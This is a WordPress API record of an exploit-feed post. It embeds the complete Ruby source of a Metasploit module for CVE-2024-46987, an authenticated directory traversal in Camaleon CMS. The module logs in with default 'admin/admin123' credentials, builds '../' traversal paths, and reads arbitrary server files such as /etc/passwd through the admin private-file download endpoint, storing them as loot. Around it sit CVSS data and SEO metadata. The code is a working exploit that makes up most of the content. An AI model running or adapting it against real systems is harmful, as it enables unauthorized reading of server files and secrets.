{"id":47702,"date":"2026-04-17T14:38:20","date_gmt":"2026-04-17T14:38:20","guid":{"rendered":"http:\/\/localhost\/?p=47702"},"modified":"2026-04-17T14:38:20","modified_gmt":"2026-04-17T14:38:20","slug":"camaleon-cms-directory-traversal-cve-2024-46987","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=47702","title":{"rendered":"Camaleon CMS Directory Traversal CVE-2024-46987_MSF:AUXILIARY-GATHER-CAMALEON_DOWNLOAD_PRIVATE_FILE-"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-04-17T19:28:03&#8243;,&#8221;description&#8221;:&#8221;Exploits CVE-2024-46987, an authenticated directory traversal vulnerability in Camaleon CMS versions use auxiliary\/gather\/camaleondownloadprivatefile msf auxiliarycamaleondownloadprivatefile show actions &#8230;actions&#8230; msf&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-04-17T19:01:35&#8243;,&#8221;modified&#8221;:&#8221;2026-04-17T19:01:35&#8243;,&#8221;type&#8221;:&#8221;metasploit&#8221;,&#8221;title&#8221;:&#8221;Camaleon CMS Directory Traversal CVE-2024-46987&#8243;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;MSF:AUXILIARY-GATHER-CAMALEON_DOWNLOAD_PRIVATE_FILE-&#8220;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2024-46987&#8243;],&#8221;sourceData&#8221;:&#8221;##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Auxiliary\\n  include Msf::Auxiliary::Report\\n  include Msf::Exploit::Remote::HttpClient\\n\\n  def initialize(info = {})\\n    super(\\n      update_info(\\n        info,\\n        &#8216;Name&#8217; =\\u003e &#8216;Camaleon CMS Directory Traversal CVE-2024-46987&#8217;,\\n        &#8216;Description&#8217; =\\u003e %q{\\n          Exploits CVE-2024-46987, an authenticated directory traversal\\n          vulnerability in Camaleon CMS versions \\u003c= 2.8.0 and 2.9.0\\n        },\\n        &#8216;Author&#8217; =\\u003e [\\n          &#8216;Peter Stockli&#8217;, # Vulnerability Disclosure\\n          &#8216;Goultarde&#8217;,     # Python Script\\n          &#8216;bootstrapbool&#8217;, # Metasploit Module\\n        ],\\n        &#8216;License&#8217; =\\u003e MSF_LICENSE,\\n        &#8216;Privileged&#8217; =\\u003e true,\\n        &#8216;Platform&#8217; =\\u003e &#8216;linux&#8217;,\\n        &#8216;References&#8217; =\\u003e [\\n          [&#8216;CVE&#8217;, &#8216;2024-46987&#8217;],\\n          [\\n            &#8216;URL&#8217;,  # Advisory\\n            &#8216;https:\/\/securitylab.github.com\/advisories\/GHSL-2024-182_GHSL-2024-186_Camaleon_CMS\/&#8217;\\n          ],\\n          [\\n            &#8216;URL&#8217;,  # Python Script\\n            &#8216;https:\/\/github.com\/Goultarde\/CVE-2024-46987&#8217;\\n          ],\\n        ],\\n        &#8216;DisclosureDate&#8217; =\\u003e &#8216;2024-08-08&#8217;,\\n        &#8216;Notes&#8217; =\\u003e {\\n          &#8216;Stability&#8217; =\\u003e [CRASH_SAFE],\\n          &#8216;Reliability&#8217; =\\u003e [REPEATABLE_SESSION],\\n          &#8216;SideEffects&#8217; =\\u003e [IOC_IN_LOGS]\\n        }\\n      )\\n    )\\n    register_options(\\n      [\\n        OptString.new(&#8216;USERNAME&#8217;, [true, &#8216;Valid username&#8217;, &#8216;admin&#8217;]),\\n        OptString.new(&#8216;PASSWORD&#8217;, [true, &#8216;Valid password&#8217;, &#8216;admin123&#8217;]),\\n        OptString.new(&#8216;FILEPATH&#8217;, [true, &#8216;The path to the file to read&#8217;, &#8216;\/etc\/passwd&#8217;]),\\n        OptString.new(&#8216;TARGETURI&#8217;, [false, &#8216;The Camaleon CMS base path&#8217;]),\\n        OptInt.new(&#8216;DEPTH&#8217;, [ true, &#8216;Depth for Path Traversal&#8217;, 13 ]),\\n        OptBool.new(&#8216;STORE_LOOT&#8217;, [false, &#8216;Store the target file as loot&#8217;, true])\\n      ]\\n    )\\n  end\\n\\n  def build_traversal_path(filepath, depth)\\n    if depth == 0\\n      return filepath\\n    end\\n\\n    # Remove C:\\\\ prefix if present (path traversal doesn&#8217;t work with drive letters)\\n    normalized_path = filepath.gsub(\/^[A-Z]:\\\\\\\\\/, &#8221;).gsub(\/^[A-Z]:\/, &#8221;)\\n\\n    traversal = &#8216;..\/&#8217; * depth\\n\\n    if normalized_path[0] == &#8216;\/&#8217;\\n      return \\&#8221;#{traversal[0..-2]}#{normalized_path}\\&#8221;\\n    end\\n\\n    \\&#8221;#{traversal}#{normalized_path}\\&#8221;\\n  end\\n\\n  def get_token(login_uri)\\n    res = send_request_cgi({ &#8216;uri&#8217; =\\u003e login_uri, &#8216;keep_cookies&#8217; =\\u003e true })\\n\\n    return nil unless res \\u0026\\u0026 res.code == 200\\n\\n    match = res.body.match(\/name=\\&#8221;authenticity_token\\&#8221; value=\\&#8221;([^\\&#8221;]+)\\&#8221;\/)\\n\\n    return match ? match[1] : nil\\n  end\\n\\n  def authenticate(username, password)\\n    login_uri = normalize_uri(target_uri.path, &#8216;admin\/login&#8217;)\\n\\n    vprint_status(\\&#8221;Retrieving token from #{login_uri}\\&#8221;)\\n\\n    token = get_token(login_uri)\\n\\n    if token.nil? || cookie_jar.empty?\\n      fail_with(Failure::UnexpectedReply, &#8216;Failed to retrieve token&#8217;)\\n    end\\n\\n    vprint_status(\\&#8221;Retrieved token #{token}\\&#8221;)\\n    vprint_status(\\&#8221;Authenticating to #{login_uri}\\&#8221;)\\n\\n    res = send_request_cgi({\\n      &#8216;method&#8217; =\\u003e &#8216;POST&#8217;,\\n      &#8216;uri&#8217; =\\u003e login_uri,\\n      &#8216;keep_cookies&#8217; =\\u003e true,\\n      &#8216;vars_post&#8217; =\\u003e {\\n        &#8216;authenticity_token&#8217; =\\u003e token,\\n        &#8216;user[username]&#8217; =\\u003e username,\\n        &#8216;user[password]&#8217; =\\u003e password\\n      }\\n    })\\n\\n    unless res \\u0026\\u0026 res.code == 302\\n      fail_with(Failure::NoAccess, &#8216;Authentication failed&#8217;)\\n    end\\n\\n    res = send_request_cgi(\\n      &#8216;uri&#8217; =\\u003e normalize_uri(target_uri.path, &#8216;admin\/dashboard&#8217;)\\n    )\\n\\n    if res.body.downcase.include?(&#8216;logout&#8217;)\\n      vprint_status(&#8216;Authentication succeeded&#8217;)\\n      return\\n    end\\n\\n    fail_with(Failure::NoAccess, &#8216;Authentication failed&#8217;)\\n  end\\n\\n  def get_version\\n    vprint_status(&#8216;Attempting to get build number&#8217;)\\n\\n    res = send_request_cgi(\\n      &#8216;uri&#8217; =\\u003e normalize_uri(target_uri.path, &#8216;admin\/dashboard&#8217;)\\n    )\\n\\n    return nil unless res \\u0026\\u0026 res.code == 200\\n\\n    html = res.get_html_document\\n\\n    version_div = html.css(&#8216;div.pull-right&#8217;).find do |div|\\n      div.at_css(&#8216;b&#8217;) \\u0026\\u0026 div.at_css(&#8216;b&#8217;).text.strip == &#8216;Version&#8217;\\n    end\\n\\n    if version_div\\n      match = version_div.text.strip.match(\/Version\\\\s*(\\\\S+)\/)\\n      return match[1] if match\\n    end\\n  end\\n\\n  def vuln_version?(version)\\n    print_status(\\&#8221;Detected build version is #{version}\\&#8221;)\\n\\n    if version == &#8216;2.9.0&#8217; || Rex::Version.new(version) \\u003c Rex::Version.new(&#8216;2.8.1&#8217;)\\n      print_status(&#8216;Version is vulnerable&#8217;)\\n      return true\\n    end\\n\\n    print_warning(&#8216;Version is not vulnerable&#8217;)\\n    false\\n  end\\n\\n  def get_file(filepath)\\n    filepath = build_traversal_path(filepath, datastore[&#8216;DEPTH&#8217;])\\n\\n    lfi_uri = normalize_uri(\\n      target_uri.path,\\n      &#8216;admin\/media\/download_private_file&#8217;\\n    )\\n\\n    vprint_status(\\&#8221;Attempting to retrieve file #{filepath} from #{lfi_uri}\\&#8221;)\\n\\n    res = send_request_cgi({\\n      &#8216;uri&#8217; =\\u003e lfi_uri,\\n      &#8216;vars_get&#8217; =\\u003e {\\n        &#8216;file&#8217; =\\u003e filepath\\n      },\\n      &#8216;encode_params&#8217; =\\u003e false\\n    })\\n\\n    if res\\n      if res.code == 404\\n        return nil\\n      end\\n\\n      if res.body.downcase.include?(&#8216;invalid file&#8217;)\\n        return nil\\n      end\\n\\n      vprint_good(&#8216;Successfully retrieved file&#8217;)\\n      return res.body\\n    end\\n  end\\n\\n  def run\\n    cookie_jar.clear\\n\\n    authenticate(datastore[&#8216;USERNAME&#8217;], datastore[&#8216;PASSWORD&#8217;])\\n\\n    res = get_file(datastore[&#8216;FILEPATH&#8217;])\\n\\n    if res.nil? || res == false || !res.is_a?(String)\\n      fail_with(Failure::PayloadFailed, &#8216;Failed to obtain file&#8217;)\\n    end\\n\\n    if datastore[&#8216;STORE_LOOT&#8217;]\\n      path = store_loot(\\n        &#8216;camaleon.traversal&#8217;,\\n        &#8216;text\/plain&#8217;,\\n        datastore[&#8216;RHOST&#8217;],\\n        res,\\n        datastore[&#8216;FILEPATH&#8217;]\\n      )\\n      print_good(\\&#8221;#{datastore[&#8216;FILEPATH&#8217;]} stored as &#8216;#{path}&#8217;\\&#8221;)\\n    end\\n\\n    print_line\\n    print_line(res)\\n  end\\n\\n  def check\\n    cookie_jar.clear\\n\\n    authenticate(datastore[&#8216;USERNAME&#8217;], datastore[&#8216;PASSWORD&#8217;])\\n\\n    version = get_version\\n\\n    if version.nil?\\n      return Exploit::CheckCode::Unknown(&#8216;Failed to get build version&#8217;)\\n    elsif vuln_version?(version) != true\\n      return Exploit::CheckCode::Safe\\n    end\\n\\n    res = get_file(datastore[&#8216;FILEPATH&#8217;])\\n\\n    if res.nil? || res == false || !res.is_a?(String)\\n      print_error(&#8216;Failed to obtain file&#8217;)\\n      return Exploit::CheckCode::Appears\\n    end\\n\\n    Exploit::CheckCode::Vulnerable\\n  end\\nend\\n&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/auxiliary\/gather\/camaleon_download_private_file.rb&#8221;,&#8221;cvss&#8221;:{&#8220;score&#8221;:7.7,&#8221;severity&#8221;:&#8221;HIGH&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:N\/S:C\/C:H\/I:N\/A:N&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/gather\/camaleon_download_private_file\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-04-17T19:28:03&#8243;,&#8221;description&#8221;:&#8221;Exploits CVE-2024-46987, an authenticated directory traversal vulnerability in Camaleon CMS versions use auxiliary\/gather\/camaleondownloadprivatefile msf auxiliarycamaleondownloadprivatefile show actions &#8230;actions&#8230; msf&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-04-17T19:01:35&#8243;,&#8221;modified&#8221;:&#8221;2026-04-17T19:01:35&#8243;,&#8221;type&#8221;:&#8221;metasploit&#8221;,&#8221;title&#8221;:&#8221;Camaleon CMS Directory Traversal CVE-2024-46987&#8243;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;MSF:AUXILIARY-GATHER-CAMALEON_DOWNLOAD_PRIVATE_FILE-&#8220;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2024-46987&#8243;],&#8221;sourceData&#8221;:&#8221;##\\n# This module&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,87,12,15,169,13,7,11,5],"class_list":["post-47702","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-77","tag-exploit","tag-high","tag-metasploit","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Camaleon CMS Directory Traversal CVE-2024-46987_MSF:AUXILIARY-GATHER-CAMALEON_DOWNLOAD_PRIVATE_FILE- zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=47702\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Camaleon CMS Directory Traversal CVE-2024-46987_MSF:AUXILIARY-GATHER-CAMALEON_DOWNLOAD_PRIVATE_FILE- zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-04-17T19:28:03&#8243;,&#8221;description&#8221;:&#8221;Exploits CVE-2024-46987, an authenticated directory traversal vulnerability in Camaleon CMS versions use auxiliary\/gather\/camaleondownloadprivatefile msf auxiliarycamaleondownloadprivatefile show actions &#8230;actions&#8230; msf&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-04-17T19:01:35&#8243;,&#8221;modified&#8221;:&#8221;2026-04-17T19:01:35&#8243;,&#8221;type&#8221;:&#8221;metasploit&#8221;,&#8221;title&#8221;:&#8221;Camaleon CMS Directory Traversal CVE-2024-46987&#8243;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;MSF:AUXILIARY-GATHER-CAMALEON_DOWNLOAD_PRIVATE_FILE-&#8220;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2024-46987&#8243;],&#8221;sourceData&#8221;:&#8221;##n# This module...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=47702\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-04-17T14:38:20+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=47702#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=47702\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"Camaleon CMS Directory Traversal CVE-2024-46987_MSF:AUXILIARY-GATHER-CAMALEON_DOWNLOAD_PRIVATE_FILE-\",\"datePublished\":\"2026-04-17T14:38:20+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=47702\"},\"wordCount\":1155,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-7.7\",\"exploit\",\"HIGH\",\"metasploit\",\"news\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=47702#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=47702\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=47702\",\"name\":\"Camaleon CMS Directory Traversal CVE-2024-46987_MSF:AUXILIARY-GATHER-CAMALEON_DOWNLOAD_PRIVATE_FILE- zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-04-17T14:38:20+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=47702#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=47702\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=47702#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Camaleon CMS Directory Traversal CVE-2024-46987_MSF:AUXILIARY-GATHER-CAMALEON_DOWNLOAD_PRIVATE_FILE-\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Camaleon CMS Directory Traversal CVE-2024-46987_MSF:AUXILIARY-GATHER-CAMALEON_DOWNLOAD_PRIVATE_FILE- zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=47702","og_locale":"en_US","og_type":"article","og_title":"Camaleon CMS Directory Traversal CVE-2024-46987_MSF:AUXILIARY-GATHER-CAMALEON_DOWNLOAD_PRIVATE_FILE- zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-04-17T19:28:03&#8243;,&#8221;description&#8221;:&#8221;Exploits CVE-2024-46987, an authenticated directory traversal vulnerability in Camaleon CMS versions use auxiliary\/gather\/camaleondownloadprivatefile msf auxiliarycamaleondownloadprivatefile show actions &#8230;actions&#8230; msf&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-04-17T19:01:35&#8243;,&#8221;modified&#8221;:&#8221;2026-04-17T19:01:35&#8243;,&#8221;type&#8221;:&#8221;metasploit&#8221;,&#8221;title&#8221;:&#8221;Camaleon CMS Directory Traversal CVE-2024-46987&#8243;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;MSF:AUXILIARY-GATHER-CAMALEON_DOWNLOAD_PRIVATE_FILE-&#8220;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2024-46987&#8243;],&#8221;sourceData&#8221;:&#8221;##n# This module...","og_url":"https:\/\/zero.redgem.net\/?p=47702","og_site_name":"zero redgem","article_published_time":"2026-04-17T14:38:20+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"6 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=47702#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=47702"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"Camaleon CMS Directory Traversal CVE-2024-46987_MSF:AUXILIARY-GATHER-CAMALEON_DOWNLOAD_PRIVATE_FILE-","datePublished":"2026-04-17T14:38:20+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=47702"},"wordCount":1155,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-7.7","exploit","HIGH","metasploit","news","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=47702#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=47702","url":"https:\/\/zero.redgem.net\/?p=47702","name":"Camaleon CMS Directory Traversal CVE-2024-46987_MSF:AUXILIARY-GATHER-CAMALEON_DOWNLOAD_PRIVATE_FILE- zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-04-17T14:38:20+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=47702#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=47702"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=47702#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"Camaleon CMS Directory Traversal CVE-2024-46987_MSF:AUXILIARY-GATHER-CAMALEON_DOWNLOAD_PRIVATE_FILE-"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/47702","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=47702"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/47702\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=47702"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=47702"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=47702"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}